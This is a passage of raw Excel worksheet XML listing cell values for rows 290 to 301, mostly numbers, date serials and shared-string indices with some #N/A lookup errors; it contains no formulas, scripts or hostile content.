        <v>61121</v>
      </c>
      <c r="AH290">
        <v>16</v>
      </c>
      <c r="AJ290">
        <v>252</v>
      </c>
      <c r="AK290" t="s">
        <v>387</v>
      </c>
      <c r="AL290" t="s">
        <v>388</v>
      </c>
      <c r="AM290" t="s">
        <v>2450</v>
      </c>
      <c r="AN290" t="s">
        <v>68</v>
      </c>
      <c r="AO290">
        <v>1994</v>
      </c>
      <c r="AP290">
        <v>313976351</v>
      </c>
      <c r="AQ290" t="s">
        <v>1350</v>
      </c>
      <c r="AR290" t="s">
        <v>1351</v>
      </c>
      <c r="AS290" t="s">
        <v>71</v>
      </c>
      <c r="AT290" t="s">
        <v>86</v>
      </c>
      <c r="AU290" t="e">
        <v>#N/A</v>
      </c>
      <c r="AV290" t="e">
        <v>#N/A</v>
      </c>
      <c r="AW290" t="e">
        <v>#N/A</v>
      </c>
      <c r="AX290" t="e">
        <v>#N/A</v>
      </c>
      <c r="AY290" t="e">
        <v>#N/A</v>
      </c>
      <c r="AZ290" t="e">
        <v>#N/A</v>
      </c>
      <c r="BA290" t="s">
        <v>16644</v>
      </c>
      <c r="BB290" t="s">
        <v>14420</v>
      </c>
      <c r="BC290">
        <v>0</v>
      </c>
      <c r="BD290">
        <v>0</v>
      </c>
    </row>
    <row r="291" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A291">
        <v>247</v>
      </c>
      <c r="B291" t="s">
        <v>2451</v>
      </c>
      <c r="C291" t="s">
        <v>157</v>
      </c>
      <c r="D291" t="s">
        <v>2452</v>
      </c>
      <c r="E291" t="s">
        <v>2453</v>
      </c>
      <c r="F291" t="s">
        <v>2454</v>
      </c>
      <c r="G291" s="1">
        <v>43847</v>
      </c>
      <c r="AF291" t="s">
        <v>1348</v>
      </c>
      <c r="AG291">
        <v>61121</v>
      </c>
      <c r="AH291">
        <v>16</v>
      </c>
      <c r="AJ291">
        <v>252</v>
      </c>
      <c r="AK291" t="s">
        <v>387</v>
      </c>
      <c r="AL291" t="s">
        <v>388</v>
      </c>
      <c r="AM291" t="s">
        <v>2455</v>
      </c>
      <c r="AN291" t="s">
        <v>82</v>
      </c>
      <c r="AO291">
        <v>2000</v>
      </c>
      <c r="AP291">
        <v>313976351</v>
      </c>
      <c r="AQ291" t="s">
        <v>1350</v>
      </c>
      <c r="AR291" t="s">
        <v>1351</v>
      </c>
      <c r="AS291" t="s">
        <v>71</v>
      </c>
      <c r="AT291" t="s">
        <v>86</v>
      </c>
      <c r="AU291" t="e">
        <v>#N/A</v>
      </c>
      <c r="AV291" t="e">
        <v>#N/A</v>
      </c>
      <c r="AW291" t="e">
        <v>#N/A</v>
      </c>
      <c r="AX291" t="e">
        <v>#N/A</v>
      </c>
      <c r="AY291" t="e">
        <v>#N/A</v>
      </c>
      <c r="AZ291" t="e">
        <v>#N/A</v>
      </c>
      <c r="BA291" t="s">
        <v>16644</v>
      </c>
      <c r="BB291" t="s">
        <v>14421</v>
      </c>
      <c r="BC291">
        <v>0</v>
      </c>
      <c r="BD291">
        <v>0</v>
      </c>
    </row>
    <row r="292" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A292">
        <v>527</v>
      </c>
      <c r="B292" t="s">
        <v>2456</v>
      </c>
      <c r="C292" t="s">
        <v>99</v>
      </c>
      <c r="D292" t="s">
        <v>2457</v>
      </c>
      <c r="E292" t="s">
        <v>916</v>
      </c>
      <c r="F292" t="s">
        <v>2458</v>
      </c>
      <c r="G292" s="1">
        <v>43852</v>
      </c>
      <c r="AF292" t="s">
        <v>2459</v>
      </c>
      <c r="AG292">
        <v>11330</v>
      </c>
      <c r="AH292">
        <v>12</v>
      </c>
      <c r="AJ292">
        <v>159</v>
      </c>
      <c r="AK292" t="s">
        <v>2460</v>
      </c>
      <c r="AL292" t="s">
        <v>2461</v>
      </c>
      <c r="AM292" t="s">
        <v>2462</v>
      </c>
      <c r="AN292" t="s">
        <v>55</v>
      </c>
      <c r="AO292">
        <v>2014</v>
      </c>
      <c r="AP292" t="s">
        <v>2463</v>
      </c>
      <c r="AQ292" t="s">
        <v>2464</v>
      </c>
      <c r="AR292" t="s">
        <v>2465</v>
      </c>
      <c r="AS292" t="s">
        <v>553</v>
      </c>
      <c r="AT292" t="s">
        <v>72</v>
      </c>
      <c r="AU292">
        <v>0</v>
      </c>
      <c r="AV292">
        <v>0</v>
      </c>
      <c r="AW292">
        <v>0</v>
      </c>
      <c r="AX292">
        <v>0</v>
      </c>
      <c r="AY292">
        <v>6</v>
      </c>
      <c r="AZ292">
        <v>2</v>
      </c>
      <c r="BA292" t="s">
        <v>16711</v>
      </c>
      <c r="BB292" t="s">
        <v>14645</v>
      </c>
      <c r="BC292">
        <v>0</v>
      </c>
      <c r="BD292">
        <v>0</v>
      </c>
    </row>
    <row r="293" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A293">
        <v>1324</v>
      </c>
      <c r="B293" t="s">
        <v>2466</v>
      </c>
      <c r="C293" t="s">
        <v>318</v>
      </c>
      <c r="D293" t="s">
        <v>2467</v>
      </c>
      <c r="E293" t="s">
        <v>809</v>
      </c>
      <c r="F293" t="s">
        <v>2468</v>
      </c>
      <c r="G293" s="1">
        <v>44258</v>
      </c>
      <c r="H293">
        <v>19</v>
      </c>
      <c r="I293">
        <v>19</v>
      </c>
      <c r="J293">
        <v>0</v>
      </c>
      <c r="K293">
        <v>0</v>
      </c>
      <c r="L293">
        <v>0</v>
      </c>
      <c r="M293">
        <v>0</v>
      </c>
      <c r="N293">
        <v>0</v>
      </c>
      <c r="O293">
        <v>0</v>
      </c>
      <c r="P293">
        <v>0</v>
      </c>
      <c r="Q293">
        <v>0</v>
      </c>
      <c r="R293">
        <v>0</v>
      </c>
      <c r="S293">
        <v>0</v>
      </c>
      <c r="T293">
        <v>2</v>
      </c>
      <c r="U293">
        <v>0</v>
      </c>
      <c r="V293">
        <v>0</v>
      </c>
      <c r="W293">
        <v>0</v>
      </c>
      <c r="X293">
        <v>0</v>
      </c>
      <c r="Y293">
        <v>0</v>
      </c>
      <c r="Z293">
        <v>0</v>
      </c>
      <c r="AA293">
        <v>0</v>
      </c>
      <c r="AB293">
        <v>0</v>
      </c>
      <c r="AC293">
        <v>0</v>
      </c>
      <c r="AD293">
        <v>0</v>
      </c>
      <c r="AE293">
        <v>15000</v>
      </c>
      <c r="AF293" t="s">
        <v>2469</v>
      </c>
      <c r="AG293">
        <v>90000</v>
      </c>
      <c r="AH293">
        <v>26</v>
      </c>
      <c r="AJ293">
        <v>403</v>
      </c>
      <c r="AK293" t="s">
        <v>2255</v>
      </c>
      <c r="AL293" t="s">
        <v>2256</v>
      </c>
      <c r="AM293" t="s">
        <v>2470</v>
      </c>
      <c r="AN293" t="s">
        <v>55</v>
      </c>
      <c r="AO293">
        <v>1999</v>
      </c>
      <c r="AP293">
        <v>81343772469</v>
      </c>
      <c r="AQ293" t="s">
        <v>2471</v>
      </c>
      <c r="AR293" t="s">
        <v>2472</v>
      </c>
      <c r="AS293" t="s">
        <v>71</v>
      </c>
      <c r="AT293" t="s">
        <v>58</v>
      </c>
      <c r="AU293">
        <v>0</v>
      </c>
      <c r="AV293">
        <v>0</v>
      </c>
      <c r="AW293">
        <v>0</v>
      </c>
      <c r="AX293">
        <v>0</v>
      </c>
      <c r="AY293">
        <v>4</v>
      </c>
      <c r="AZ293">
        <v>12</v>
      </c>
      <c r="BA293" t="s">
        <v>16847</v>
      </c>
      <c r="BB293" t="s">
        <v>15166</v>
      </c>
      <c r="BC293" t="s">
        <v>9485</v>
      </c>
      <c r="BD293" t="s">
        <v>10625</v>
      </c>
    </row>
    <row r="294" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A294">
        <v>1310</v>
      </c>
      <c r="B294" t="s">
        <v>2473</v>
      </c>
      <c r="C294" t="s">
        <v>157</v>
      </c>
      <c r="D294" t="s">
        <v>2474</v>
      </c>
      <c r="E294" t="s">
        <v>142</v>
      </c>
      <c r="F294" t="s">
        <v>2475</v>
      </c>
      <c r="G294" s="1">
        <v>44267</v>
      </c>
      <c r="H294">
        <v>46</v>
      </c>
      <c r="I294">
        <v>46</v>
      </c>
      <c r="J294">
        <v>2</v>
      </c>
      <c r="K294">
        <v>0</v>
      </c>
      <c r="L294">
        <v>2</v>
      </c>
      <c r="M294">
        <v>2</v>
      </c>
      <c r="N294">
        <v>0</v>
      </c>
      <c r="O294">
        <v>0</v>
      </c>
      <c r="P294">
        <v>0</v>
      </c>
      <c r="Q294">
        <v>4</v>
      </c>
      <c r="R294">
        <v>2</v>
      </c>
      <c r="S294">
        <v>0</v>
      </c>
      <c r="T294">
        <v>0</v>
      </c>
      <c r="U294">
        <v>150000</v>
      </c>
      <c r="V294">
        <v>0</v>
      </c>
      <c r="W294">
        <v>5000</v>
      </c>
      <c r="X294">
        <v>450</v>
      </c>
      <c r="Y294">
        <v>0</v>
      </c>
      <c r="Z294">
        <v>0</v>
      </c>
      <c r="AA294">
        <v>0</v>
      </c>
      <c r="AB294">
        <v>50</v>
      </c>
      <c r="AC294">
        <v>100</v>
      </c>
      <c r="AD294">
        <v>0</v>
      </c>
      <c r="AE294">
        <v>0</v>
      </c>
      <c r="AF294" t="s">
        <v>2476</v>
      </c>
      <c r="AG294">
        <v>60294</v>
      </c>
      <c r="AH294">
        <v>16</v>
      </c>
      <c r="AJ294">
        <v>264</v>
      </c>
      <c r="AK294" t="s">
        <v>2477</v>
      </c>
      <c r="AL294" t="s">
        <v>162</v>
      </c>
      <c r="AM294" t="s">
        <v>2478</v>
      </c>
      <c r="AN294" t="s">
        <v>55</v>
      </c>
      <c r="AO294">
        <v>2007</v>
      </c>
      <c r="AP294" t="s">
        <v>2479</v>
      </c>
      <c r="AQ294" t="s">
        <v>2480</v>
      </c>
      <c r="AR294" t="s">
        <v>2476</v>
      </c>
      <c r="AS294" t="s">
        <v>71</v>
      </c>
      <c r="AT294" t="s">
        <v>58</v>
      </c>
      <c r="AU294">
        <v>25</v>
      </c>
      <c r="AV294">
        <v>0</v>
      </c>
      <c r="AW294">
        <v>55</v>
      </c>
      <c r="AX294">
        <v>5</v>
      </c>
      <c r="AY294">
        <v>12</v>
      </c>
      <c r="AZ294">
        <v>7</v>
      </c>
      <c r="BA294" t="s">
        <v>16844</v>
      </c>
      <c r="BB294" t="s">
        <v>15190</v>
      </c>
      <c r="BC294">
        <v>0</v>
      </c>
      <c r="BD294" t="s">
        <v>9509</v>
      </c>
    </row>
    <row r="295" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A295">
        <v>1237</v>
      </c>
      <c r="B295" t="s">
        <v>2481</v>
      </c>
      <c r="C295" t="s">
        <v>157</v>
      </c>
      <c r="D295" t="s">
        <v>2482</v>
      </c>
      <c r="E295" t="s">
        <v>142</v>
      </c>
      <c r="F295" t="s">
        <v>143</v>
      </c>
      <c r="G295" s="1">
        <v>43938</v>
      </c>
      <c r="H295">
        <v>72</v>
      </c>
      <c r="I295">
        <v>72</v>
      </c>
      <c r="J295">
        <v>2</v>
      </c>
      <c r="K295">
        <v>0</v>
      </c>
      <c r="L295">
        <v>1</v>
      </c>
      <c r="M295">
        <v>1</v>
      </c>
      <c r="N295">
        <v>0</v>
      </c>
      <c r="O295">
        <v>0</v>
      </c>
      <c r="P295">
        <v>0</v>
      </c>
      <c r="Q295">
        <v>10</v>
      </c>
      <c r="R295">
        <v>0</v>
      </c>
      <c r="S295">
        <v>0</v>
      </c>
      <c r="T295">
        <v>4</v>
      </c>
      <c r="U295">
        <v>160000</v>
      </c>
      <c r="V295">
        <v>0</v>
      </c>
      <c r="W295">
        <v>3000</v>
      </c>
      <c r="X295">
        <v>1000</v>
      </c>
      <c r="Y295">
        <v>0</v>
      </c>
      <c r="Z295">
        <v>0</v>
      </c>
      <c r="AA295">
        <v>0</v>
      </c>
      <c r="AB295">
        <v>300</v>
      </c>
      <c r="AC295">
        <v>0</v>
      </c>
      <c r="AD295">
        <v>0</v>
      </c>
      <c r="AE295">
        <v>77000</v>
      </c>
      <c r="AF295" t="s">
        <v>2483</v>
      </c>
      <c r="AG295">
        <v>64154</v>
      </c>
      <c r="AH295">
        <v>16</v>
      </c>
      <c r="AJ295">
        <v>233</v>
      </c>
      <c r="AK295" t="s">
        <v>2484</v>
      </c>
      <c r="AL295" t="s">
        <v>2485</v>
      </c>
      <c r="AM295" t="s">
        <v>2486</v>
      </c>
      <c r="AN295" t="s">
        <v>55</v>
      </c>
      <c r="AO295">
        <v>2015</v>
      </c>
      <c r="AP295">
        <v>3544521139</v>
      </c>
      <c r="AQ295" t="s">
        <v>2487</v>
      </c>
      <c r="AR295" t="s">
        <v>2483</v>
      </c>
      <c r="AS295" t="s">
        <v>71</v>
      </c>
      <c r="AT295" t="s">
        <v>58</v>
      </c>
      <c r="AU295">
        <v>24</v>
      </c>
      <c r="AV295">
        <v>1</v>
      </c>
      <c r="AW295">
        <v>12</v>
      </c>
      <c r="AX295">
        <v>36</v>
      </c>
      <c r="AY295">
        <v>2</v>
      </c>
      <c r="AZ295">
        <v>4</v>
      </c>
      <c r="BA295" t="s">
        <v>16825</v>
      </c>
      <c r="BB295" t="s">
        <v>15145</v>
      </c>
      <c r="BC295" t="s">
        <v>9515</v>
      </c>
      <c r="BD295">
        <v>0</v>
      </c>
    </row>
    <row r="296" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A296">
        <v>1468</v>
      </c>
      <c r="B296" t="s">
        <v>2488</v>
      </c>
      <c r="C296" t="s">
        <v>168</v>
      </c>
      <c r="D296" t="s">
        <v>2489</v>
      </c>
      <c r="E296" t="s">
        <v>142</v>
      </c>
      <c r="F296" t="s">
        <v>2490</v>
      </c>
      <c r="G296" s="1">
        <v>44253</v>
      </c>
      <c r="H296">
        <v>151</v>
      </c>
      <c r="I296">
        <v>151</v>
      </c>
      <c r="J296">
        <v>1</v>
      </c>
      <c r="K296">
        <v>0</v>
      </c>
      <c r="L296">
        <v>0</v>
      </c>
      <c r="M296">
        <v>0</v>
      </c>
      <c r="N296">
        <v>0</v>
      </c>
      <c r="O296">
        <v>0</v>
      </c>
      <c r="P296">
        <v>0</v>
      </c>
      <c r="Q296">
        <v>0</v>
      </c>
      <c r="R296">
        <v>0</v>
      </c>
      <c r="S296">
        <v>0</v>
      </c>
      <c r="T296">
        <v>0</v>
      </c>
      <c r="U296">
        <v>600000</v>
      </c>
      <c r="V296">
        <v>0</v>
      </c>
      <c r="W296">
        <v>0</v>
      </c>
      <c r="X296">
        <v>0</v>
      </c>
      <c r="Y296">
        <v>0</v>
      </c>
      <c r="Z296">
        <v>0</v>
      </c>
      <c r="AA296">
        <v>0</v>
      </c>
      <c r="AB296">
        <v>0</v>
      </c>
      <c r="AC296">
        <v>0</v>
      </c>
      <c r="AD296">
        <v>0</v>
      </c>
      <c r="AE296">
        <v>0</v>
      </c>
      <c r="AF296" t="s">
        <v>2491</v>
      </c>
      <c r="AG296">
        <v>12600</v>
      </c>
      <c r="AH296">
        <v>13</v>
      </c>
      <c r="AJ296">
        <v>184</v>
      </c>
      <c r="AK296" t="s">
        <v>637</v>
      </c>
      <c r="AL296" t="s">
        <v>2492</v>
      </c>
      <c r="AM296" t="s">
        <v>2493</v>
      </c>
      <c r="AN296" t="s">
        <v>55</v>
      </c>
      <c r="AO296">
        <v>2007</v>
      </c>
      <c r="AP296" t="s">
        <v>2494</v>
      </c>
      <c r="AQ296" t="s">
        <v>2495</v>
      </c>
      <c r="AR296" t="s">
        <v>2496</v>
      </c>
      <c r="AS296" t="s">
        <v>179</v>
      </c>
      <c r="AT296" t="s">
        <v>58</v>
      </c>
      <c r="AU296">
        <v>26</v>
      </c>
      <c r="AV296">
        <v>3</v>
      </c>
      <c r="AW296">
        <v>5</v>
      </c>
      <c r="AX296">
        <v>0</v>
      </c>
      <c r="AY296">
        <v>151</v>
      </c>
      <c r="AZ296">
        <v>16</v>
      </c>
      <c r="BA296" t="s">
        <v>16906</v>
      </c>
      <c r="BB296" t="s">
        <v>15300</v>
      </c>
      <c r="BC296" t="s">
        <v>12812</v>
      </c>
      <c r="BD296">
        <v>0</v>
      </c>
    </row>
    <row r="297" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A297">
        <v>1097</v>
      </c>
      <c r="B297" t="s">
        <v>2497</v>
      </c>
      <c r="C297" t="s">
        <v>318</v>
      </c>
      <c r="D297" t="s">
        <v>2498</v>
      </c>
      <c r="E297" t="s">
        <v>142</v>
      </c>
      <c r="F297" t="s">
        <v>2499</v>
      </c>
      <c r="G297" s="1">
        <v>44085</v>
      </c>
      <c r="H297">
        <v>184</v>
      </c>
      <c r="I297">
        <v>184</v>
      </c>
      <c r="J297">
        <v>2</v>
      </c>
      <c r="K297">
        <v>0</v>
      </c>
      <c r="L297">
        <v>1</v>
      </c>
      <c r="M297">
        <v>0</v>
      </c>
      <c r="N297">
        <v>500</v>
      </c>
      <c r="O297">
        <v>0</v>
      </c>
      <c r="P297">
        <v>0</v>
      </c>
      <c r="Q297">
        <v>0</v>
      </c>
      <c r="R297">
        <v>0</v>
      </c>
      <c r="S297">
        <v>0</v>
      </c>
      <c r="T297">
        <v>0</v>
      </c>
      <c r="U297">
        <v>120000</v>
      </c>
      <c r="V297">
        <v>0</v>
      </c>
      <c r="W297">
        <v>3000</v>
      </c>
      <c r="X297">
        <v>0</v>
      </c>
      <c r="Y297">
        <v>0</v>
      </c>
      <c r="Z297">
        <v>0</v>
      </c>
      <c r="AA297">
        <v>0</v>
      </c>
      <c r="AB297">
        <v>0</v>
      </c>
      <c r="AC297">
        <v>0</v>
      </c>
      <c r="AD297">
        <v>0</v>
      </c>
      <c r="AE297">
        <v>0</v>
      </c>
      <c r="AF297" t="s">
        <v>2500</v>
      </c>
      <c r="AG297">
        <v>90241</v>
      </c>
      <c r="AH297">
        <v>26</v>
      </c>
      <c r="AJ297">
        <v>420</v>
      </c>
      <c r="AK297" t="s">
        <v>331</v>
      </c>
      <c r="AL297" t="s">
        <v>332</v>
      </c>
      <c r="AM297" t="s">
        <v>2501</v>
      </c>
      <c r="AN297" t="s">
        <v>55</v>
      </c>
      <c r="AO297">
        <v>2018</v>
      </c>
      <c r="AP297" t="s">
        <v>2502</v>
      </c>
      <c r="AQ297" t="s">
        <v>2503</v>
      </c>
      <c r="AR297" t="s">
        <v>2500</v>
      </c>
      <c r="AU297">
        <v>25</v>
      </c>
      <c r="AV297">
        <v>1</v>
      </c>
      <c r="AW297">
        <v>28</v>
      </c>
      <c r="AX297">
        <v>16</v>
      </c>
      <c r="AY297">
        <v>10</v>
      </c>
      <c r="AZ297">
        <v>3</v>
      </c>
      <c r="BA297" t="s">
        <v>16800</v>
      </c>
      <c r="BB297" t="s">
        <v>15049</v>
      </c>
      <c r="BC297">
        <v>0</v>
      </c>
      <c r="BD297" t="s">
        <v>10075</v>
      </c>
    </row>
    <row r="298" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A298">
        <v>1381</v>
      </c>
      <c r="B298" t="s">
        <v>2504</v>
      </c>
      <c r="C298" t="s">
        <v>129</v>
      </c>
      <c r="D298" t="s">
        <v>2505</v>
      </c>
      <c r="E298" t="s">
        <v>1977</v>
      </c>
      <c r="F298" t="s">
        <v>2506</v>
      </c>
      <c r="G298" s="1">
        <v>43913</v>
      </c>
      <c r="H298">
        <v>207</v>
      </c>
      <c r="I298">
        <v>207</v>
      </c>
      <c r="J298">
        <v>1</v>
      </c>
      <c r="K298">
        <v>0</v>
      </c>
      <c r="L298">
        <v>0</v>
      </c>
      <c r="M298">
        <v>1</v>
      </c>
      <c r="N298">
        <v>0</v>
      </c>
      <c r="O298">
        <v>0</v>
      </c>
      <c r="P298">
        <v>0</v>
      </c>
      <c r="Q298">
        <v>2</v>
      </c>
      <c r="R298">
        <v>40</v>
      </c>
      <c r="S298">
        <v>0</v>
      </c>
      <c r="T298">
        <v>1</v>
      </c>
      <c r="U298">
        <v>3000</v>
      </c>
      <c r="V298">
        <v>0</v>
      </c>
      <c r="W298">
        <v>0</v>
      </c>
      <c r="X298">
        <v>100</v>
      </c>
      <c r="Y298">
        <v>0</v>
      </c>
      <c r="Z298">
        <v>0</v>
      </c>
      <c r="AA298">
        <v>0</v>
      </c>
      <c r="AB298">
        <v>100</v>
      </c>
      <c r="AC298">
        <v>2000</v>
      </c>
      <c r="AD298">
        <v>0</v>
      </c>
      <c r="AE298">
        <v>2000</v>
      </c>
      <c r="AF298" t="s">
        <v>2507</v>
      </c>
      <c r="AG298">
        <v>15128</v>
      </c>
      <c r="AH298">
        <v>11</v>
      </c>
      <c r="AJ298">
        <v>270</v>
      </c>
      <c r="AK298" t="s">
        <v>620</v>
      </c>
      <c r="AL298" t="s">
        <v>2508</v>
      </c>
      <c r="AM298" t="s">
        <v>2509</v>
      </c>
      <c r="AN298" t="s">
        <v>55</v>
      </c>
      <c r="AO298">
        <v>2014</v>
      </c>
      <c r="AP298" t="s">
        <v>2510</v>
      </c>
      <c r="AQ298" t="s">
        <v>2511</v>
      </c>
      <c r="AR298" t="s">
        <v>2512</v>
      </c>
      <c r="AS298" t="s">
        <v>57</v>
      </c>
      <c r="AT298" t="s">
        <v>58</v>
      </c>
      <c r="AU298">
        <v>28</v>
      </c>
      <c r="AV298">
        <v>2</v>
      </c>
      <c r="AW298">
        <v>0</v>
      </c>
      <c r="AX298">
        <v>0</v>
      </c>
      <c r="AY298">
        <v>46</v>
      </c>
      <c r="AZ298">
        <v>11</v>
      </c>
      <c r="BA298" t="s">
        <v>16865</v>
      </c>
      <c r="BB298" t="s">
        <v>15239</v>
      </c>
      <c r="BC298" t="s">
        <v>9550</v>
      </c>
      <c r="BD298" t="s">
        <v>11095</v>
      </c>
    </row>
    <row r="299" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A299">
        <v>1687</v>
      </c>
      <c r="B299" t="s">
        <v>2513</v>
      </c>
      <c r="C299" t="s">
        <v>47</v>
      </c>
      <c r="D299" t="s">
        <v>2514</v>
      </c>
      <c r="E299" t="s">
        <v>142</v>
      </c>
      <c r="F299" t="s">
        <v>666</v>
      </c>
      <c r="G299" s="1">
        <v>44200</v>
      </c>
      <c r="H299">
        <v>210</v>
      </c>
      <c r="I299">
        <v>210</v>
      </c>
      <c r="J299">
        <v>1</v>
      </c>
      <c r="K299">
        <v>0</v>
      </c>
      <c r="L299">
        <v>0</v>
      </c>
      <c r="M299">
        <v>3</v>
      </c>
      <c r="N299">
        <v>0</v>
      </c>
      <c r="O299">
        <v>0</v>
      </c>
      <c r="P299">
        <v>0</v>
      </c>
      <c r="Q299">
        <v>0</v>
      </c>
      <c r="R299">
        <v>0</v>
      </c>
      <c r="S299">
        <v>1</v>
      </c>
      <c r="T299">
        <v>0</v>
      </c>
      <c r="U299">
        <v>300000</v>
      </c>
      <c r="V299">
        <v>0</v>
      </c>
      <c r="W299">
        <v>0</v>
      </c>
      <c r="X299">
        <v>4500</v>
      </c>
      <c r="Y299">
        <v>0</v>
      </c>
      <c r="Z299">
        <v>0</v>
      </c>
      <c r="AA299">
        <v>0</v>
      </c>
      <c r="AB299">
        <v>0</v>
      </c>
      <c r="AC299">
        <v>0</v>
      </c>
      <c r="AD299">
        <v>1</v>
      </c>
      <c r="AE299">
        <v>0</v>
      </c>
      <c r="AF299" t="s">
        <v>2515</v>
      </c>
      <c r="AG299">
        <v>20414</v>
      </c>
      <c r="AH299">
        <v>2</v>
      </c>
      <c r="AJ299">
        <v>53</v>
      </c>
      <c r="AK299" t="s">
        <v>2220</v>
      </c>
      <c r="AL299" t="s">
        <v>2221</v>
      </c>
      <c r="AM299" t="s">
        <v>2516</v>
      </c>
      <c r="AN299" t="s">
        <v>68</v>
      </c>
      <c r="AO299">
        <v>2011</v>
      </c>
      <c r="AP299">
        <v>6142069157</v>
      </c>
      <c r="AQ299">
        <v>81396728888</v>
      </c>
      <c r="AR299" t="s">
        <v>2515</v>
      </c>
      <c r="AS299" t="s">
        <v>187</v>
      </c>
      <c r="AT299" t="s">
        <v>72</v>
      </c>
      <c r="AU299">
        <v>300</v>
      </c>
      <c r="AV299">
        <v>1</v>
      </c>
      <c r="AW299">
        <v>5</v>
      </c>
      <c r="AX299">
        <v>5</v>
      </c>
      <c r="AY299">
        <v>2</v>
      </c>
      <c r="AZ299">
        <v>2</v>
      </c>
      <c r="BA299" t="s">
        <v>16970</v>
      </c>
      <c r="BB299" t="s">
        <v>15451</v>
      </c>
      <c r="BC299" t="s">
        <v>12352</v>
      </c>
      <c r="BD299" t="s">
        <v>10272</v>
      </c>
    </row>
    <row r="300" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A300">
        <v>943</v>
      </c>
      <c r="B300" t="s">
        <v>2517</v>
      </c>
      <c r="C300" t="s">
        <v>168</v>
      </c>
      <c r="D300" t="s">
        <v>2518</v>
      </c>
      <c r="E300" t="s">
        <v>142</v>
      </c>
      <c r="F300" t="s">
        <v>2519</v>
      </c>
      <c r="G300" s="1">
        <v>44067</v>
      </c>
      <c r="H300">
        <v>240</v>
      </c>
      <c r="I300">
        <v>240</v>
      </c>
      <c r="J300">
        <v>1</v>
      </c>
      <c r="K300">
        <v>0</v>
      </c>
      <c r="L300">
        <v>1</v>
      </c>
      <c r="M300">
        <v>0</v>
      </c>
      <c r="N300">
        <v>0</v>
      </c>
      <c r="O300">
        <v>0</v>
      </c>
      <c r="P300">
        <v>0</v>
      </c>
      <c r="Q300">
        <v>1</v>
      </c>
      <c r="R300">
        <v>0</v>
      </c>
      <c r="S300">
        <v>0</v>
      </c>
      <c r="T300">
        <v>0</v>
      </c>
      <c r="U300">
        <v>300000</v>
      </c>
      <c r="V300">
        <v>0</v>
      </c>
      <c r="W300">
        <v>3000</v>
      </c>
      <c r="X300">
        <v>0</v>
      </c>
      <c r="Y300">
        <v>0</v>
      </c>
      <c r="Z300">
        <v>0</v>
      </c>
      <c r="AA300">
        <v>0</v>
      </c>
      <c r="AB300">
        <v>50</v>
      </c>
      <c r="AC300">
        <v>0</v>
      </c>
      <c r="AD300">
        <v>0</v>
      </c>
      <c r="AE300">
        <v>0</v>
      </c>
      <c r="AF300" t="s">
        <v>2520</v>
      </c>
      <c r="AG300">
        <v>43364</v>
      </c>
      <c r="AH300">
        <v>13</v>
      </c>
      <c r="AJ300">
        <v>162</v>
      </c>
      <c r="AK300" t="s">
        <v>2521</v>
      </c>
      <c r="AL300" t="s">
        <v>1109</v>
      </c>
      <c r="AM300" t="s">
        <v>2522</v>
      </c>
      <c r="AN300" t="s">
        <v>55</v>
      </c>
      <c r="AO300">
        <v>2010</v>
      </c>
      <c r="AP300">
        <v>8112470204</v>
      </c>
      <c r="AQ300" t="s">
        <v>2523</v>
      </c>
      <c r="AR300" t="s">
        <v>2524</v>
      </c>
      <c r="AS300" t="s">
        <v>71</v>
      </c>
      <c r="AT300" t="s">
        <v>58</v>
      </c>
      <c r="AU300">
        <v>30</v>
      </c>
      <c r="AV300">
        <v>1</v>
      </c>
      <c r="AW300">
        <v>7</v>
      </c>
      <c r="AX300">
        <v>5</v>
      </c>
      <c r="AY300">
        <v>10</v>
      </c>
      <c r="AZ300">
        <v>20</v>
      </c>
      <c r="BA300" t="s">
        <v>16780</v>
      </c>
      <c r="BB300" t="s">
        <v>14953</v>
      </c>
      <c r="BC300">
        <v>0</v>
      </c>
      <c r="BD300" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="301" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A301">
        <v>1149</v>
      </c>
      <c r="B301" t="s">
        <v>2525</v>
      </c>
      <c r="C301" t="s">
        <v>215</v>
      </c>
      <c r="D301" t="s">
        <v>2526</v>
      </c>
      <c r="E301" t="s">
        <v>111</v>
      </c>
      <c r="F301" t="s">
        <v>2527</v>
      </c>
      <c r="G301" s="1">
        <v>43845</v>
      </c>
      <c r="H301">
        <v>250</v>
      </c>
      <c r="I301">
        <v>250</v>
      </c>
      <c r="J301">
        <v>1</v>
      </c>
      <c r="K301">
        <v>1</v>
      </c>
      <c r="L301">
        <v>5</v>
      </c>
      <c r="M301">
        <v>0</v>
      </c>
      <c r="N301">
        <v>0</v>
      </c>
      <c r="O301">
        <v>0</v>
      </c>
      <c r="P301">
        <v>0</v>
      </c>
      <c r="Q301">
        <v>5</v>
      </c>
      <c r="R301">
        <v>40</v>
      </c>
      <c r="S301">
        <v>0</v>
      </c>
      <c r="T301">
        <v>0</v>
      </c>
      <c r="U301">
        <v>180000</v>
      </c>
      <c r="V301">
        <v>1</v>
      </c>
      <c r="W301">
        <v>900</v>
      </c>
      <c r="X301">
        <v>0</v>
      </c>
      <c r="Y301">
        <v>0</v>
      </c>
      <c r="Z301">
        <v>0</v>
      </c>
      <c r="AA301">
        <v>0</v>
      </c>
      <c r="AB301">
        <v>300</v>
      </c>
      <c r="AC301">
        <v>600</v>
      </c>
      <c r="AD301">
        <v>1</v>
      </c>
      <c r="AE301">
        <v>0</v>
      </c>
      <c r="AF301" t="s">
        <v>2528</v>
      </c>
      <c r="AG301">
        <v>33111</v>
      </c>
      <c r="AH301">
        <v>6</v>
      </c>
      <c r="AJ301">
        <v>147</v>
      </c>
      <c r="AK301" t="s">
        <v>2529</v>
      </c>
      <c r="AL301" t="s">
        <v>312</v>
      </c>
      <c r="AM301" t="s">
        <v>2530</v>
      </c>
      <c r="AN301" t="s">
        <v>55</v>
      </c>
      <c r="AO301">
        <v>2008</v>
      </c>
      <c r="AP301" t="s">
        <v>2531</v>
      </c>
      <c r="AQ301" t="s">
        <v>2531</v>
      </c>
      <c r="AR301" t="s">
        <v>2528</v>
      </c>
      <c r="AS301" t="s">
        <v>71</v>
      </c>
      <c r="AT301" t="s">
        <v>58</v>
      </c>
      <c r="AU301">
        <v>25</v>
      </c>
      <c r="AV301">
        <v>0</v>
